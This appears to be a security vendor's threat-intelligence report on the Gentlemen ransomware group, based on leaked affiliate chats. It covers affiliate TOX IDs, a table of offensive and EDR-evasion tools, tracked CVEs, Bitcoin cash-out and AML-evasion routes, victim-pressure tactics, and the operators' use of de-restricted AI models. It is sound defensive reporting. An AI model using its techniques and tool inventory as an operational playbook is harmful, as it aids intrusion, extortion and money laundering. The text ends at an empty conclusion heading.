  • Further chats indicate that stolen data from a UK software consultancy was later reused to attack a company in Turkey. The Gentlemen used this during negotiations as a dual‑pressure tactic: they portrayed the UK firm as the “access broker,” while mentioning to provide “proof” to the Turkish company that the intrusion originated from the UK side and encouraging it to consider legal action against the consultancy.
  • By collecting all available ransomware samples, Check Point Research identified 8 distinct affiliate TOX IDs, including the administrator’s TOX ID. This suggests that the admin not only manages the RaaS program but also actively participates in, or directly carries out, some of the infections.


Introduction

The Gentlemen ransomware‑as‑a‑service (RaaS) operation is a relatively new group that emerged around mid‑2025. Its operators advertise the service across multiple underground forums, promoting their ransomware platform and inviting penetration testers and other technically skilled actors to join as affiliates.

In 2026, based on victims listed on the data leak site (DLS), The Gentlemen appears to be one of the most active RaaS programs, with approximately 332 published victims in just the first five months of 2026. This volume places the group as the second most productive RaaS operation in that period, at least among those that publicly list their victims.

During our previous publication, Check Point Research analyzed a specific infection carried out by an affiliate of this RaaS. In that case, the affiliate used SystemBC, and the associated command‑and‑control (C&C) server revealed more than 1,570 victims.

In this publication, we focus on the affiliate program itself and the actors who participate in it. On May 4th, 2026, The Gentlemen administrator acknowledged the leak of an internal database used by the group, which contained operational information about their infrastructure, affiliates, and victims. Check Point Research obtained what appears to be a partial leak of the group’s internal chats and related data, which was briefly posted on an underground forum before being removed. Later on, the leak also appeared on another underground forum.

The leaked material includes detailed conversations between the RaaS operators and their affiliates across several internal channels (such as INFO, general, TOOLS, and PODBOR). In these chats, they coordinate ongoing intrusions, exchange toolsets and EDR‑kill packages, discuss infrastructure and backend components (including the Rocket database and NAS storage), review CVEs and exploit paths (for example Fortinet, Cisco, and NTLM relay issues), and talk about specific victims, campaigns, and payouts. Together, these messages provide a rare inside view of how The Gentlemen plans, executes, and scales its ransomware operations.


The Gentlemen RaaS Admin

The Gentlemen RaaS administrator has been very active and vocal on various underground forums, trying to attract affiliates with an aggressive profit-sharing model: 90% for affiliates and 10% for the operator.

In September 2025, in one of the first posts promoting the RaaS program, the account Zeta88 published a message advertising the service and inviting individual penetration testers to join as affiliates.

Figure 1 — Zeta88 advertising The Gentlemen’s RaaS.

Later on, the official posts for this ransomware program started to be published by another account, The Gentlemen. The administrator also shared their TOX ID across several forums.

Figure 2 — RaaS admin in underground forum.

The same TOX ID can be seen on the onion data leak site (DLS), where it is used by affiliates or compromised victims to contact the administrator.

Figure 3 — Onion page TOX ID.

In a post on an underground forum, where the administrator demonstrated how affiliates can build the ransomware, we can see the administrator’s profile page, where their TOX ID is again visible in the corresponding field.

Figure 4 — Image uploaded by RaaS admin.

In the second shared image, we again observe the same TOX ID and see how the target or victim entry is supposed to look from an affiliate’s perspective.

Figure 5 — Image uploaded by RaaS admin.

Considering that the initial post was made by Zeta88, it is likely that this account belongs to the administrator and that their TOX ID is F8E24C7F5B12CD69C44C73F438F65E9BF560ADF35EBBDF92CF9A9B84079F8F04060FF98D098E. This assessment is based on the fact that the same TOX ID appears consistently across different contexts: in the early recruitment posts, in the onion data leak site (DLS), and in the screenshots showing the administrator’s profile and communication fields. Taken together, these overlaps strongly suggest that Zeta88, the later The Gentlemen account, and this TOX ID are all controlled by the same RaaS administrator.


RaaS Affiliates

Check Point Research collected most of the available artifacts related to The Gentlemen RaaS from online sources. Based on the current 412 public victims listed on the data leak site (DLS), and considering that there are likely additional victims who paid and therefore were not published, we identified 29 unique campaigns in public sources such as VirusTotal.

For each of these 29 campaigns, we extracted the TOX ID associated with the corresponding affiliate. Our analysis shows that these campaigns were conducted by 8 unique TOX IDs.

15CE8D5DB0BAC3BCBB1FA69F2E672CC54EFBEC7684DA792F3CBF8B007A9FEA1D16374560DFA5
2F1A9C8B8AA163BBB84FF799A0954B232C279C5E9EE42505955288EAAD28685A2BC0713C7745
88984846080D639C9A4EC394E53BA616D550B2B3AD691942EA2CCD33AA5B9340FD1A8FF40E9A
98C132E2B20B531BE6604397D97040C1E9EB42FCE12EDF119BCE8B4031CA5C70DAF5E65FA3C3
D2CBA43A1AF6D965432AE11487726DB84D2945CF2CD975D7774B76B54AF052418AC2E59ADA69
D527959A7BC728CB272A0DB683B547F079C98012201A48DD2792B84604E8BC29F6E6BDB8003F
F8E24C7F5B12CD69C44C73F438F65E9BF560ADF35EBBDF92CF9A9B84079F8F04060FF98D098E
F96C481CBB0D6E7BDA49C6D68CFDB1D284354961534EDEEDA854C672B48A8D6B7146F90BDACB

There are almost certainly more affiliates involved in this group, however, based on our current locker visibility, we can confidently confirm 29 discovered campaigns and ransomware samples.

CmpID: 03860d116701cdc9d9bf9c45099bb3d3 TOX: D2CBA43A1AF6D965432AE11487726DB84D2945CF2CD975D7774B76B54AF052418AC2E59ADA69
CmpID: 11e7baca7e652995b2364fdab0d362b7 TOX: 98C132E2B20B531BE6604397D97040C1E9EB42FCE12EDF119BCE8B4031CA5C70DAF5E65FA3C3
CmpID: 2cd4eb358c45ca783a20ec854a5a860c TOX: 98C132E2B20B531BE6604397D97040C1E9EB42FCE12EDF119BCE8B4031CA5C70DAF5E65FA3C3
CmpID: 2e5d1a352885a6efd84dbc0387cbc79e TOX: D527959A7BC728CB272A0DB683B547F079C98012201A48DD2792B84604E8BC29F6E6BDB8003F
CmpID: 3b7b4f2d33bdfb8a31b480d0eb2815cd TOX: F8E24C7F5B12CD69C44C73F438F65E9BF560ADF35EBBDF92CF9A9B84079F8F04060FF98D098E
CmpID: 4a94d2b730a5a63e6cd54a9b0bb4ea71 TOX: F8E24C7F5B12CD69C44C73F438F65E9BF560ADF35EBBDF92CF9A9B84079F8F04060FF98D098E
CmpID: 4e0c37cbf4dde9683943c8a738e5b00a TOX: D527959A7BC728CB272A0DB683B547F079C98012201A48DD2792B84604E8BC29F6E6BDB8003F
CmpID: 51dec3e170f8a181cc9aea8dcc90c7ab TOX: D2CBA43A1AF6D965432AE11487726DB84D2945CF2CD975D7774B76B54AF052418AC2E59ADA69
CmpID: 583fe1c1a39f6b873a5c0997bea1f657 TOX: 15CE8D5DB0BAC3BCBB1FA69F2E672CC54EFBEC7684DA792F3CBF8B007A9FEA1D16374560DFA5
CmpID: 697f182826495662427ca49edbb345fc TOX: 98C132E2B20B531BE6604397D97040C1E9EB42FCE12EDF119BCE8B4031CA5C70DAF5E65FA3C3
CmpID: 71d503709af88821c183a1d0b7ae06ec TOX: 98C132E2B20B531BE6604397D97040C1E9EB42FCE12EDF119BCE8B4031CA5C70DAF5E65FA3C3
CmpID: 721606b3659f2c2d80a196ed3cd60053 TOX: F96C481CBB0D6E7BDA49C6D68CFDB1D284354961534EDEEDA854C672B48A8D6B7146F90BDACB
CmpID: 735069890a414869f0113de820ba9afb TOX: 98C132E2B20B531BE6604397D97040C1E9EB42FCE12EDF119BCE8B4031CA5C70DAF5E65FA3C3
CmpID: 74ea100b581ec32ea6c2ac2a0030a9f6 TOX: D2CBA43A1AF6D965432AE11487726DB84D2945CF2CD975D7774B76B54AF052418AC2E59ADA69
CmpID: 776e86c13433747299a4e5f9f22e3415 TOX: 2F1A9C8B8AA163BBB84FF799A0954B232C279C5E9EE42505955288EAAD28685A2BC0713C7745
CmpID: 7aae8fd9187c88dd0292cce1abd050e2 TOX: F8E24C7F5B12CD69C44C73F438F65E9BF560ADF35EBBDF92CF9A9B84079F8F04060FF98D098E
CmpID: 82160a7da5fc4c935e6f48d38a5aaaa6 TOX: 98C132E2B20B531BE6604397D97040C1E9EB42FCE12EDF119BCE8B4031CA5C70DAF5E65FA3C3
CmpID: 893f735e9a8cc9814dc6eccd5579561c TOX: D2CBA43A1AF6D965432AE11487726DB84D2945CF2CD975D7774B76B54AF052418AC2E59ADA69
CmpID: 8fceea4fd9ce32dd620ccd580297c7c5 TOX: 98C132E2B20B531BE6604397D97040C1E9EB42FCE12EDF119BCE8B4031CA5C70DAF5E65FA3C3
CmpID: 92d8bd2a6ee7f6d5c84e037066ce0539 TOX: 2F1A9C8B8AA163BBB84FF799A0954B232C279C5E9EE42505955288EAAD28685A2BC0713C7745
CmpID: a023a6b15419600dc3f6b93e11761dfe TOX: 98C132E2B20B531BE6604397D97040C1E9EB42FCE12EDF119BCE8B4031CA5C70DAF5E65FA3C3
CmpID: a73526d89e5fb7b57f50d8da340e53e9 TOX: D2CBA43A1AF6D965432AE11487726DB84D2945CF2CD975D7774B76B54AF052418AC2E59ADA69
CmpID: abd11823ddcc3d746ad8621e677a93eb TOX: 98C132E2B20B531BE6604397D97040C1E9EB42FCE12EDF119BCE8B4031CA5C70DAF5E65FA3C3
CmpID: b5b42ac289581b3387ebf120129a19a6 TOX: 98C132E2B20B531BE6604397D97040C1E9EB42FCE12EDF119BCE8B4031CA5C70DAF5E65FA3C3
CmpID: b68e019efb39b85f5a0326e22fd4498a TOX: F8E24C7F5B12CD69C44C73F438F65E9BF560ADF35EBBDF92CF9A9B84079F8F04060FF98D098E
CmpID: bc6b87c79bc71a78da623d031ec1a958 TOX: D2CBA43A1AF6D965432AE11487726DB84D2945CF2CD975D7774B76B54AF052418AC2E59ADA69
CmpID: d75246d230f22b1da6bbf5fceeed2ef2 TOX: D2CBA43A1AF6D965432AE11487726DB84D2945CF2CD975D7774B76B54AF052418AC2E59ADA69
CmpID: da9cff1b478b64d47b68d50330e96c60 TOX: D527959A7BC728CB272A0DB683B547F079C98012201A48DD2792B84604E8BC29F6E6BDB8003F
CmpID: ead0d7a8ae0a6ffb7f0a5873fec4ff5e TOX: 88984846080D639C9A4EC394E53BA616D550B2B3AD691942EA2CCD33AA5B9340FD1A8FF40E9A

Based on this small collection of samples, most of the campaigns appear to have been conducted by the affiliate using the TOX ID 98C132E2B20B531BE6604397D97040C1E9EB42FCE12EDF119BCE8B4031CA5C70DAF5E65FA3C3. It is also noteworthy that the RaaS administrator’s TOX ID has been observed in four unique infections. This suggests that the administrator not only manages the RaaS program but also actively participates in, or directly carries out, some of the infections.


RaaS Leak

On May 4th, 2026, on an underground forum, the RaaS administrator published a post acknowledging the claims of an internal leak involving their so‑called Rocket database, an internal backend system used to store operational data, and addressed his affiliates directly about the incident.

Figure 6 — The Gentlemen RaaS post.

The message continues in a dismissive tone toward the leak seller and then shifts focus back to “more interesting” topics. These include a full overhaul of the communication structure, the deployment of a new NAS with unlimited storage, and several technical upgrades to the locker, such as removing hardware breakpoints, performing NTDLL unhooking, and patching ETW to suppress Event Tracing for Windows.


Demanding ransom from a RaaS

On May 5th, 2026, the account n7778 with TOX ID 7862AE03A73AAC2994A61DF1F635347F2D1731A77CACC155594C6B681D201F7AD6817AD3AB0A advertised the sale of The Gentlemen’s hacked data on underground forums for 10,000 USD, payable in Bitcoin.

Figure 7 — Account selling The Gentlemen RaaS Data.

In the following days, the same account posted two MediaFire links containing proof files supporting the claimed leak.

Figure 8 — Partial leaks.

The first leaked data is a text file that contains the contents of the shadow file from The Gentlemen’s server, including user account entries and their password hashes. The file lists many usernames, among them zeta88, 3NT3R, B1d3n, C0CA, d0wnloAd1, equal1z3r, F3N1X, Gblog88, JLL, LDW, n0n3, PRTGRS, W1Z. Notably, we again see the zeta88 account, the same handle that was used in the initial underground post advertising the RaaS program, further linking this server to the RaaS administrator.

Figure 9 — shadow file content.

The second leaked data set contains partial conversations between the RaaS operators and their affiliates across several internal channels (such as INFO, general, TOOLS, and PODBOR). In these chats, they coordinate ongoing intrusions, exchange toolsets and EDR‑kill packages, discuss infrastructure and backend components, review CVEs and exploit paths, and talk about specific victims, campaigns, and payouts.

While the partial leaked data that we obtained is around 44.4 MB, a screenshot shared by the same account on another underground forum shows a total size of approximately 16.22 GB, which likely corresponds to the full leaked data set.

Figure 10 — Full leaked data screenshot.


Roles & Structure

The group appears to have a clear division of roles and responsibilities. At the core, the main operator and developer, zeta88 (most likely hastalamuerte), runs the infrastructure and builds and maintains the custom ransomware locker, the RaaS panel and builder (Linux with containers and a TOR front), as well as the GPO‑based spread mechanism and the locker’s “spread” module. This operator also curates toolsets in the TOOLS channel, including EDR kill kits and kiljalki collections, selects targets, and assigns them to specific teams, often talking about “targets”, “подбор” (selection) channels, and distributing corporate victims to groups of 2–3 people. In addition, they manage payouts and negotiations, including multi‑million ransom discussions (“переговоры на 10кк”).

Figure 11 — Image shared in the chats, zeta88 – Admin.

Considering our previous assessment that the RaaS administrator also runs campaigns himself (based on TOX IDs), the leaked chats reinforce this view: they show him personally deploying the locker and encrypting at least one victim’s environment.

Figure 12 — zeta88 locking message.

Often, messages sent by zeta88 appear to be copied or adapted from earlier messages made by hastalamuerte, and affiliates frequently mention hastalamuerte by name. Taken together with previous findings and earlier RaaS posts linked to zeta88, these patterns strongly suggest that hastalamuerte and zeta88 are very likely the same person.

Figure 13 — zeta88 – hastalamuerte message.

Below this core role, key operators or affiliates such as qbit and quant handle more hands‑on operational work. qbit is a practical operator on many cases, responsible for scanning and filtering Fortinet VPNs and other edge devices, performing reconnaissance and persistence (including “крепиться клаудом” (English: “to establish persistence via the cloud”) through Cloudflare tunnels or Zero Trust solutions), and using tools such as NetExec (NXC), RelayKing, PrivHound, and NTLM relay scanning. qbit frequently requests clear EDR killer sets, manuals, and guidance for locking ESXi environments, and also brings in new bot or access suppliers (“поставщик ботов”) (English: “supplier of bots”). quant focuses on log‑based access (“логи ЛБ”, i.e. spilled credentials for OWA/O365 and similar services) and maintains a custom log parser and proprietary credential/data collector, referred to as buildx641, which is run from a domain‑joined machine, uses vssadmin, shadow copies, ntds.dit, and SYSTEM copies, and collects and compresses data from multiple hosts. quant is oriented toward OW/OVA spam and higher‑value (“тир1”) (English: “tier‑1”) victims and has set up a powerful “brute server” (Threadripper PRO, 128 GB RAM, RTX 5090) for large‑scale brute forcing.

Around these core and key operators, there are several other accounts, including Wick, mAst3r, Protagor, Bl0ck, JeLLy, Kunder, and Mamba who take on various roles such as red‑teamers, advertising partners, access brokers, or case‑specific collaborators; for example, Protagor is mentioned in connection with OV (online vault/OWA‑type) spam, while Mamba acts as an access broker for Fortinet VPNs sourced from ramp.

Through this specific leak, we identified 9 unique accounts actively communicating with each other: Kunder, qbit, JeLLy, Protagor, zeta88, Bl0ck, Wick, quant, and mAst3r. This internal interaction pattern supports the view that these accounts form a coordinated operational network within The Gentlemen RaaS ecosystem. This number aligns with our earlier assessment based on the unique TOX IDs extracted from the ransomware lockers.

Group members collaborate on various infections and share the profits as well. As a result, the 90% share allocated to the affiliate is often split among multiple affiliates who worked together to achieve a successful intrusion.

Figure 14 — Collaboration and profit sharing.

Based on the analyzed chat messages, the organization’s structure appears to match the model shown in the following image. It is likely that additional members exist who do not appear in this specific leak, but the roles and relationships we observe here are consistent across the available data. There are also indications of an internal separation between trusted members and newcomers—for example, one message notes that “that Rocket is still alive – there are rookies there”—suggesting a tiered or layered structure within the group.

Figure 15 — Organization diagram.


Operational workflow

The conversations from the leak show a fairly standard but well‑organized operational workflow. The group claims to usually gain initial access through exposed edge devices such as VPN appliances, firewalls, and other internet-facing systems, with a particular focus on platforms like Fortinet FortiGate and Cisco. They combine different methods to achieve this, including credential brute‑forcing against web or VPN panels, exploiting known vulnerabilities, and buying access from third‑party “bot” or access brokers. Screenshots shared in the chats also show them searching for accounts and credentials in data‑breach search engines. Once they obtain a foothold, they treat these systems as pivots to move deeper into the internal network.

Figure 16 — Searching credentials & accounts.

After gaining access, the operators perform internal reconnaissance and privilege escalation to understand the environment and obtain higher-level permissions, often aiming for domain administrator access. They rely on a mixture of Active Directory discovery, certificate abuse, and various local privilege escalation techniques. At the same time, they invest significant effort into disabling or bypassing security tools such as EDR and antivirus solutions, using a combination of misconfigurations, registry abuse, logging mechanisms, and bring-your-own-vulnerable-driver–style (BYOD) techniques to tamper with or overwrite security binaries.

With elevated access and reduced defensive visibility, the group focuses on expanding across the network and preparing for the final stages of the attack. This includes lateral movement, establishing additional tunnels or proxies for reliable connectivity, and relaxing security settings to make further operations easier. They also harvest credentials and browser-based sessions to reuse existing access to corporate services. Data exfiltration is then carried out using automated tools and tuned configurations to move large volumes of data efficiently, often targeting NAS devices, backup systems, and virtualization infrastructure. Finally, once the environment is prepared and critical data is in their control, they deploy their custom ransomware “locker,” which is designed to spread quickly across the network, leverage existing administrator sessions, and encrypt systems in a coordinated manner.


Tools & Infra

The leaked conversations show that The Gentlemen RaaS operators use a repeatable and fairly mature toolset to support their operations. For remote access and C2, they rely on frameworks like ZeroPulse and Velociraptor, combined with Cloudflare-based tunnels and custom VPN setups to keep stable access into compromised networks. For offensive operations, they use a range of red‑team utilities such as NetExec, RelayKing, TaskHound, PrivHound, CertiHound, and others to perform Active Directory discovery, certificate abuse, privilege escalation, and file share discovery. A separate group of tools is dedicated to EDR and AV evasion, including EDRStartupHinder, gfreeze, glinker, and DumpBrowserSecrets, as well as techniques inspired by public research on abusing Windows logging and Event Tracing for Windows (ETW). Finally, they support these activities with infrastructure and helper tools like port scanners (gogo.exe), usage guides, OSINT extensions, and password‑cracking services, which together give them a reusable framework for running repeated intrusions and ransomware deployments.

CategoryTool / ResourcePurpose / UsageReference / Notes
C2 / Remote AccessZeroPulseRemote access / C2 framework for controlling compromised hosts.https://github.com/jxroot/ZeroPulse
C2 / Remote AccessVelociraptorUsed as a covert C2 platform, including memory and LSASS dumping.Often used with signed builds to reduce detection.
C2 / Remote AccessCloudflare Zero Trust / TunnelsProvides stealthy tunnels into victim networks over HTTPS.Used together with custom VPN setups.
VPN / Network Accesswireguard-installAutomates WireGuard VPN deployment.https://github.com/angristan/wireguard-install
VPN / Network Accessopenvpn-installAutomates OpenVPN server setup.https://github.com/angristan/openvpn-install
VPN / Network AccessDouble-VPN-with-OpenVPNConfigures double‑layer OpenVPN routing.https://github.com/pizdatiigus/Double-VPN-with-OpenVPN
Offensive / Red‑TeamNetExec (NXC)Multi‑purpose offensive framework for AD, SMB, WinRM, and more.Internal usage guide via a shared NXC gist.
Offensive / Red‑TeamTaskHoundTask and privilege abuse / persistence helper.Used post‑exploitation.
Offensive / Red‑TeamPrivHoundIdentifies local privilege escalation paths and persistence opportunities.Integrates with BloodHound data.
Offensive / Red‑TeamRelayKing-DepthFinds and exploits NTLM relay paths across protocols.https://github.com/depthsecurity/RelayKing-Depth
Offensive / Red‑TeamCertiHoundEnumerates and detects ADCS misconfigurations (ESC1–ESC17).Used via NetExec integration.
Offensive / Red‑TeamTitanisOffensive tooling for Windows logging / ETW manipulation.https://github.com/trustedsec/Titanis
Offensive / Red‑TeamMANSPIDERSearches file shares for sensitive strings and documents.Used for locating valuable data.
Offensive / Red‑TeamPowerZureAbuses Azure / cloud misconfigurations.Used for cloud‑side access and escalation.
Offensive / Red‑TeamRegPwnRegistry‑based privilege escalation and service abuse.Often used for MSI service abuse.
Offensive / Red‑TeamKslDumpDumps Kerberos / LSASS‑related material.Used for credential theft.
Offensive / Red‑TeamKslKatzKerberos / LSASS post‑exploitation tool similar to credential dumpers.Complements KslDump.
EDR / AV EvasionEDRStartupHinderBlocks or delays EDR processes at startup.Based on the EDR-Startup-Process-Blocker concept.
EDR / AV EvasiongfreezePart of their EDR “killer” toolkit to hinder security products.Derived from EDR‑blocking research/code.
EDR / AV EvasionglinkerAnother component in their EDR evasion sets.Often grouped with gfreeze.
EDR / AV EvasionDumpBrowserSecretsDumps browser cookies and secrets for session hijacking.Used to reuse corporate web sessions.
EDR / AV Evasionzerosalarium ETW/log tricksPublic research they follow for ETW and log‑based EDR kill techniques.Multiple posts referenced for inspiration.
Infra / Scanninggogo.exeScanner for common ports and exposed services.Used in early discovery phases.
Infra / ScanningNXC usage gistInternal guide for effective NetExec usage.https://gist.github.com/gitgotgitgotit/81a578e065da1ccd8c81a8e90c309275
OSINT / Helper ToolsSputnik browser extensionOSINT aggregation extension to support recon.Helps enrich target information.
OSINT / Helper Toolschamd5.orgOnline password hash cracking service.Used for recovering cleartext passwords.
OSINT / Helper Toolshashcracking_botBot‑based password cracking service.Complements other cracking methods.

The leaked chats show that the group pays close attention to other ransomware operations, including the leaked Black Basta negotiations. In particular, they discuss Black Basta’s approach to code signing and note how that group allegedly used VirusTotal to search for legitimate code‑signing certificates, which were then targeted for brute‑force attacks on their private keys. The Gentlemen actors refer to this technique as a model they can reuse or adapt, highlighting their interest in abusing trusted certificates to make their binaries look legitimate and harder to detect.

Figure 17 — Code signing conversations.


AI mentions

The Gentlemen mention AI usage in multiple channels and for various purposes. While it is clear that they have already used AI for code‑assisted development, including experiments with Chinese models, more advanced use cases—such as locally deploying models to analyze large volumes of exfiltrated victim data—are only discussed at a conceptual level. These ideas are suggested in the chats but do not appear to be fully implemented.

zeta88 states that he built the GLOCKER admin panel in three days using AI‑assisted coding. He is candid about the limitations of this approach, noting that while AI can speed up development, you still need to understand what you are doing and be able to guide and correct the code it produces.

Figure 18 — zeta88 “vibe-coded” the Panel.

Members share their AI preferences across different chats. zeta88 states that he finds DeepSeek, Qwen, Kimi, and Emi the most effective models for his purposes, particularly for coding assistance and technical queries.

Figure 19 — AI preferences.

He also suggests adding more Chinese LLMs to their toolkit, in addition to those they are already considering or using, such as DeepSeek and Qwen.

Figure 20 — Chinese LLMs suggestions.

A couple of months later, qbit shares in the INFO channel their recommendation for “the most radical neural network, which creates any content without censorship. Runs on Qwen 3.5 with all barriers removed… Zero refusals. Absolutely no restrictions.”

Figure 21 — Qwen 3.5 post.

zeta88 directs affiliates to use AI as a quick reference—for example, to look up FortiGate internals—rather than asking in the channel.

Figure 22 — Usage of AI as quick reference.

For more challenging tasks such as operational data analysis, identifying high‑value access points, and offloading much of the manual data‑triage work to an AI model, the operators explicitly discuss using an uncensored, self‑hosted LLM. However these suggestions appear to remain theoretical, as Protagor admits, “I have no idea how to do that, but I think it’s possible.

Figure 23 — Local, self-hosted LLM.

Screenshot shared in the chats shows an LLM response on how to send an email to all users via the Jira admin interface, in Russian. It describes two methods, mainly using Jira Automation and user groups.

Figure 24 — Screenshot shared in the chats.

The group appears to be experimenting with well‑known Chinese LLMs and has considered using locally hosted models to assist with data triage on stolen information.


CVEs and Exploits

While the group discusses these vulnerabilities, shares related links, and occasionally attempts to exploit specific systems using particular CVEs, we cannot confirm whether the targeted machines were actually vulnerable to the exact vulnerabilities they referenced.

  • CVE-2024-55591 – FortiOS management interface

This vulnerability affects the FortiOS management interface and fits directly into their broader focus on Fortinet appliances as high‑value initial access points. While the chats do not show detailed exploitation steps, the presence of this CVE alongside their FortiGate targeting suggests it is part of the set of vulnerabilities they track for potential use against exposed management interfaces.

Figure 25 — CVE-2024-55591, related message.
  • CVE-2025-32433 – Erlang SSH vulnerability (Cisco context)

In the logs, qbit shares a proof-of-concept (PoC) for CVE-2025-32433, and zeta88 comments on its quality and applicability. This shows that the group is not simply aware of the CVE but is actively evaluating whether it can be used in real operations, specifically in environments where Cisco or Erlang-based SSH services are exposed. Even if they are cautious about PoC reliability, the discussion confirms that this vulnerability is part of their potential exploit toolkit.

Figure 26 — qbit & zeta88 related posts.
  • CVE-2025-33073 – NTLM reflection / NTLM relay

qbit references RelayKing and shares output showing domains being scanned for NTLM relay issues, including checks that explicitly cover CVE-2025-33073. This is strong evidence that they are not just reading about the vulnerability but have integrated RelayKing into their standard reconnaissance process to generate target lists for tools like ntlmrelayx. In other words, CVE-2025-33073 is a vulnerability they actively scan for and intend to exploit as part of broader NTLM relay workflows.

Figure 27 — Mention of CVE-2025-33073.
  • Other Exploit Paths (Without Explicit CVE IDs)

The operators also make heavy use of technique-based exploits where no specific CVE number is mentioned in the chats. These include:

  • MSI service abuse via RegPwn, used for privilege escalation.
  • Veeam to domain admin paths, based on public write‑ups about misconfigured backup infrastructure.
  • iDRAC to domain admin paths, leveraging Dell iDRAC weaknesses.
  • WPR, AutoLogger, and ETW manipulation techniques documented by zerosalarium and others to overwrite or disable security binaries.


Payments & Negotiations

Zeta88 acts as the organizer/administrator, distributing cryptocurrency payouts to team members (including those who are “AFK”) and advising on how to cash out proceeds via Bitcoin wallets (Guarda, Trust Wallet, Exodus). The group discusses AML (Anti-Money Laundering) evasion strategies. Zeta88 sends a BTC transaction to Kunder as a payout, which Kunder confirms receiving.

Figure 28 — Transaction link shared.

The specific mentions of how they handle Bitcoin laundering/cash out:

  1. Exchange Chains (“связки обмена”) Zeta88 mentions running ~800 transactions through “buy desks” (скупов) via exchange chains, or sometimes sending directly, suggesting chain-hopping to obscure transaction origins.
  2. AML Checking They discuss whether their BTC is “clean” and reference a buyer who actively checks AML scores before transacting. They’re uncertain how the scoring works but are aware their coins could be traced.
  3. Tinkoff QR Code Cash-Out A specific method mentioned: a buyer converts BTC to cash via Tinkoff bank QR codes, with minimums of 400k rubles (previously 250k). This converts crypto directly to Russian banking infrastructure.
  4. Physical Cash Delivery Kunder mentions “locking in the rate” and a guy physically bringing cash at the end of the month, a classic peer-to-peer OTC (over-the-counter) arrangement that bypasses exchanges entirely.
  5. Wallet Infrastructure They recommend non-custodial wallets (Guarda, Trust Wallet, Exodus) specifically to avoid KYC/AML controls that centralized exchanges enforce.

Blurry screenshots from the leak also shed light on the financial side of the operation. Although not fully legible, they appear to show a negotiation where the group secured approximately 190,000 USD after a discount of about 60,000 USD from the initial ransom demand.

Figure 29 — Agreement to pay 190,000 USD.

zeta88 is very aware of the importance of maximizing pressure on extorted victims to increase the chances of payment. In his private channel, he drafts a generic follow‑up letter that can be adapted to any company, emphasizing the costs of not paying the ransom, including regulatory exposure, reputational damage, and operational impact, and citing assessments from previous attacks. This is not the standard ransom note deployed alongside the encryption, but an additional, more tailored communication intended to reinforce the pressure on the victim.

Figure 30 — Negotiation playbook.


Interesting Negotiation Case

In a high‑profile attack in April 2026, a software consultancy company from United Kingdom publicly reported a breach. The company’s leadership stated in an open letter that only “typical business data, including business contact information, contracts, and NDAs related to client work” had been accessed.

From what appears to be a personal channel used by zeta88, he drafts a ransom demand letter addressed to the UK company, detailing what The Gentlemen claim to have exfiltrated, including customer infrastructure data, secrets, OAuth credentials, and more. The letter explicitly emphasizes potential GDPR violations as leverage to pressure the victim into paying.

Figure 31 — Ransom note.

Two weeks later, the group published the consultancy’s identity and breach details on their data leak site (DLS). According to the internal chats, data exfiltrated from the consultancy was then reused both before and during attacks against a company in Turkey, where The Gentlemen gained initial access via a vulnerable VPN appliance.

Figure 32 — Forti access to company in Turkey.

zeta88 ran this operation alongside Protagor, creating a backdoor Okta service account himself—typical of his intensive, hands‑on involvement in many of the intrusions documented in the leaked discussions. During the same campaign, zeta88 explicitly references data from the UK consultancy breach to cross‑reference and enrich information about the Turkish company, illustrating how prior compromises are used to enrich and support new attacks.

Figure 33 — UK company containing information for Turkish company.

One example mentioned was an internal “Transfer/Migration Document” (in the local language), an internal project document the consultancy maintained in its own collaboration platform describing work they did for the company in Turkey. This document, stolen in the first breach, was then used in the second.

The group discussed how best to use this access for extortion. In their internal chats, they talked about publishing the company from Turkey on their DLS together with a statement that, The access to the company in Turkey was obtained through the compromised consultancy from United Kingdom.

Figure 34 — DLS statement discussions.

This served a dual purpose:

  1. Punishing the consultancy (UK), which the actors described as “a very bad company.”
  2. Increasing pressure on the company in Turkey, by promising to show exactly how they gained access so that, the Turkish would be encouraged to legally pursue the consultancy in UK.
Figure 35 — Initial access proof.

Eventually, the Turkish company was published on the group’s DLS, and the attackers “credited” the consultancy in UK as their “access broker”.


Their View of Other RaaS Programs and Actors

The actors consistently frame the RaaS ecosystem through the lenses of brand strength, payout reliability, and affiliate leverage (percentage splits and control over negotiations). Among the programs mentioned, they clearly distinguish a small “top tier” from a broader landscape of lesser or untrusted players.

Program / GroupThings DiscussedSubjective Sentiment (Their View)
HelloKittyName/brand as something they’d like to use; jokes about linking to the real Hello Kitty site and putting (R) everywhere; described explicitly as a “мощный бренд”.Very positive on brand strength and recognition; sees it as a powerful marketing asset.
KrakenMention that “товарищи кракен” wrote to qbitqbit later says their team might “move” over to zeta88’s side.Neutral‑pragmatic; current or past orbit, but clearly willing to switch away for better options.
Dragon ForceOne of only two programs zeta88 would choose from “all presented”; explicitly says they pay both operators and adverts; only negative comments heard were about their software/panel.Strongly positive overall; trusted, in the top tier of programs they respect.
GunraListed among candidate PPs for a supplier; zeta88 says “че эт ваще такое…”, and lumps it with Hyflock; calls the operator “этот мудень”.Negative; unserious / low‑relevance; clear disdain for the operator.
HyflockSame context as Gunrazeta88 dismisses it in the same breath as Gunra, with the same derogatory comment about the person behind it.Negative; grouped with Gunra as not to be taken seriously.
ShadowByt3$ RAASAppears in the candidate list; zeta88 simply comments “хз” (doesn’t know).Neutral; no formed opinion, neither trust nor distrust expressed.
AnubisAppears in the candidate list; zeta88 asks “% видел он?”, focusing on what percentage they take.Cautious / skeptical; interest hinges on profit split; no clear positive trust.
CHAOSAppears in the candidate list; zeta88 asks whether they will still take that supplier (“возьмут ли они его еще”).Uncertain; doubts about acceptance / relationship continuity; not a clearly preferred option.
LockBit (tooling)quant asks what a локбит тулза actually is (builder or decryptor), notes he has not opened it; no explicit evaluation of the group itself.Curious but cautious; tooling is not trusted or fully understood yet; no explicit sentiment on LockBit group.
Black Basta / Devmanquant asks if “блек баста это девман”; zeta88 speaks harshly about “David” and his link to Devman, calls him “мудак” and “чепуха”, wishes them невыплат (non‑payment).Strongly negative but personalized; animosity toward David/Devman rather than a structured view of the RaaS.
“Red team” / Mr Beng clusterMentions Редтим=красный лотос=арсен=баламут=студент and “мистер БЕНГ”; mocks offer of 15k for “source code” of a C2 built on top of white tools (Velociraptor, etc.); ridicules this as overpriced and based on legitimate software.Negative; sees them as overpriced grifters repackaging white tools with heavy marketing.


Conclusion

